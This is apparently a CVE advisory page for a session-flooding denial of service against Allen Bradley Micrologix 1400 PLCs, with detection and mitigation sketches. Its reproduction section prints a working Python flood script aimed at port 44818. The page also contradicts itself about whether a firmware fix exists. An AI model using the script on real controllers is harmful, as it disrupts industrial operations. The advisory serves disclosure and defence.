CVE-2017-12093
Description
An exploitable insufficient resource pool vulnerability exists in the session communication functionality of Allen Bradley Micrologix 1400 Series B Firmware 21.2 and before. A specially crafted stream of packets can cause a flood of the session resource pool resulting in legitimate connections to the PLC being disconnected. An attacker can send unauthenticated packets to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An insufficient resource pool vulnerability in Allen Bradley Micrologix 1400 allows unauthenticated attackers to disconnect legitimate sessions via a flood of session packets.
Vulnerability
The vulnerability exists in the session communication functionality of Allen Bradley Micrologix 1400 Series B Firmware versions 21.2 and prior. The PLC supports up to ten active connections; when a new connection request arrives while the pool is full, it disconnects the oldest connection. By sending a flood of "Register Session" packets, an attacker can repeatedly trigger disconnections [1].
Exploitation
An unauthenticated attacker can send a specially crafted stream of packets over the network (default port 44818) to the PLC. This causes a loop of session registrations, disconnecting legitimate connections. A user in an online RSLogix session receives a communications loss alert and can attempt to reconnect, but if the flood continues, the legitimate session is quickly pushed out again [1].
Impact
The attack results in denial of service: legitimate users (RSLinx/RSLogix sessions) are disconnected from the PLC, preventing access. The PLC continues to operate in its current state, but remote access is disrupted. Confidentiality and integrity are not affected, but availability is compromised (CVSS 5.3) [1].
Mitigation
Rockwell Automation has released firmware version 21.3 to address this vulnerability. Users are advised to update to the latest firmware. No workarounds are mentioned in the advisory. The CVE is not in KEV as of now [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <=21.2
- Talos/Allen Bradley (v5) Range: Allen Bradley Micrologix 1400 Series B FRN 21.2, Allen Bradley Micrologix 1400 Series B FRN 21.0, Allen Bradley Micrologix 1400 Series B FRN 15
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient resource pool management: the PLC allows unauthenticated session registration packets to exhaust the limited connection pool (10 max), evicting legitimate sessions without rate-limiting or prioritization."
Attack vector
An unauthenticated attacker on the network sends a crafted stream of "Register Session" packets to the PLC on EtherNet/IP port 44818 (default). The Micrologix 1400 supports only ten active connections at a time; when a new connection request arrives while all slots are full, the PLC disconnects the oldest connection to make room. By flooding the device with these packets in a loop, the attacker continuously forces out legitimate RSLinx/RSLogix sessions, causing a denial-of-service condition where authorized users cannot maintain access to the PLC [1].
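A detection sketch for the traffic pattern described above, added here as an example and not taken from the Talos advisory or from Rockwell: it parses the 24-byte EtherNet/IP encapsulation header in TCP payloads seen on port 44818 and flags any source that sends more Register Session requests (command 0x0065) inside a sliding window than the PLC has connection slots. The window length, the threshold, the function names and the sample events are assumptions.

```python
import struct
from collections import defaultdict, deque

# Encapsulation header: command, length, session handle, status, sender context, options
ENCAP_HDR = struct.Struct("<HHII8sI")
REGISTER_SESSION = 0x0065
POOL_SIZE = 10  # connection limit stated in the text above


def count_register_session(payload: bytes) -> int:
    """Count Register Session requests in one TCP payload (messages may be back to back)."""
    count, off = 0, 0
    while off + ENCAP_HDR.size <= len(payload):
        command, length, _sess, _status, _ctx, _opts = ENCAP_HDR.unpack_from(payload, off)
        if command == REGISTER_SESSION and length == 4:
            count += 1
        off += ENCAP_HDR.size + length  # skip the command-specific data
    return count


def flag_floods(events, window=1.0, threshold=POOL_SIZE):
    """Return {source: peak count} for sources exceeding `threshold` requests per window."""
    recent = defaultdict(deque)  # source -> timestamps of recent requests
    peaks = {}
    for ts, src, payload in sorted(events, key=lambda e: e[0]):
        q = recent[src]
        q.extend([ts] * count_register_session(payload))
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks


# Constructed sample traffic (not a capture): one workstation registering once, and
# one host sending 40 requests in about 0.1 s, four per TCP segment.
REG = ENCAP_HDR.pack(REGISTER_SESSION, 4, 0, 0, b"\x00" * 8, 0) + struct.pack("<HH", 1, 0)
SAMPLE = [(0.00, "192.0.2.10", REG)]
SAMPLE += [(0.10 + i * 0.01, "192.0.2.66", REG * 4) for i in range(10)]

if __name__ == "__main__":
    for src, peak in flag_floods(SAMPLE).items():
        print(f"{src}: {peak} Register Session requests within 1 s")
```

Counting per message rather than per segment matters because requests sent back to back on one stream can be coalesced into a single TCP payload.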
Affected code
The vulnerability resides in the session communication functionality of the Allen Bradley Micrologix 1400 Series B firmware (FRN 21.2 and earlier). The PLC's session management code handles "Register Session" packets (the same type used by RSLinx to create connections) but does not rate-limit or throttle incoming session registration requests [1].
What the fix does
The advisory does not include a patch or specific remediation code. The vendor disclosure timeline shows the issue was reported on 2017-09-22 and publicly released on 2018-03-28, but no fix is described in the reference write-up [1]. Mitigation would require implementing rate-limiting or a cap on session registration requests per time window, or modifying the connection eviction policy so that unauthenticated session requests cannot displace established authenticated sessions.
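The difference between the evict-oldest behaviour and a capped policy can be seen in a small model, added here as an example; it is not firmware code and not the vendor's fix. The `SessionPool` class, the per-source cap of 3 and the workload are assumptions chosen for illustration.

```python
from collections import OrderedDict

POOL_SIZE = 10  # active-connection limit given in the text above


class SessionPool:
    """Toy model of a fixed-size session table; per_source_cap=None means evict-oldest."""

    def __init__(self, size=POOL_SIZE, per_source_cap=None):
        self.size, self.cap = size, per_source_cap
        self.sessions = OrderedDict()  # handle -> source, oldest first
        self.next_handle = 1

    def _evict_oldest(self, source=None):
        """Drop the oldest session (optionally only one owned by `source`)."""
        for handle, owner in self.sessions.items():
            if source is None or owner == source:
                del self.sessions[handle]
                return owner
        return None

    def register(self, source):
        """Admit a session; return the source that lost a session, or None."""
        evicted = None
        held = sum(1 for s in self.sessions.values() if s == source)
        if self.cap is not None and held >= self.cap:
            evicted = self._evict_oldest(source)  # requester recycles its own slot
        elif len(self.sessions) >= self.size:
            evicted = self._evict_oldest()        # behaviour described above
        self.sessions[self.next_handle] = source
        self.next_handle += 1
        return evicted


def surviving_sources(pool, requests):
    """Replay registration requests and return the sources still holding a session."""
    for source in requests:
        pool.register(source)
    return set(pool.sessions.values())


# Constructed workload: one engineering workstation, then 1000 requests from one host.
WORKLOAD = ["workstation"] + ["flooder"] * 1000

if __name__ == "__main__":
    print("evict-oldest:", surviving_sources(SessionPool(), WORKLOAD))
    print("per-source cap:", surviving_sources(SessionPool(per_source_cap=3), WORKLOAD))
```

A per-source cap only protects against a single noisy host; requests spread across many sources still reach the evict-oldest branch, which is why the text also mentions rate limits and protecting established sessions.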
Preconditions
- network: Attacker must have network access to the target PLC on port 44818 (EtherNet/IP)
- auth: No authentication required; packets are sent unauthenticated
- input: The PLC must have at least one active legitimate session to be disrupted (though the attack works regardless)
Reproduction
The following Python script (from the Talos advisory) sends a flood of "Register Session" packets to the target PLC, exhausting the session resource pool and disconnecting legitimate connections [1]:
```
import argparse
import socket

parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ipaddr", help="target ip address", type=str)
parser.add_argument("-p", "--port", help="target port", default=44818, type=int)
parser.add_argument("-n", "--numpackets", help="the number of packets to send", default=100000, type=int)
args = parser.parse_args()

dst = args.ipaddr
port = args.port
num_packets = args.numpackets

def register_session():
    registersession_data = "\x65\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x28\x1e\x4d\x00\x00\x00\x00\x01\x00\x00\x00"
    sock.send(registersession_data)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((dst, port))

for i in range(num_packets):
    register_session()

sock.shutdown(socket.SHUT_RDWR)
sock.close()
```
Run as: `python script.py -i <PLC_IP> [-p <port>] [-n <num_packets>]`
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] www.talosintelligence.com/vulnerability_reports/TALOS-2017-0445 (mitre, x_refsource_MISC)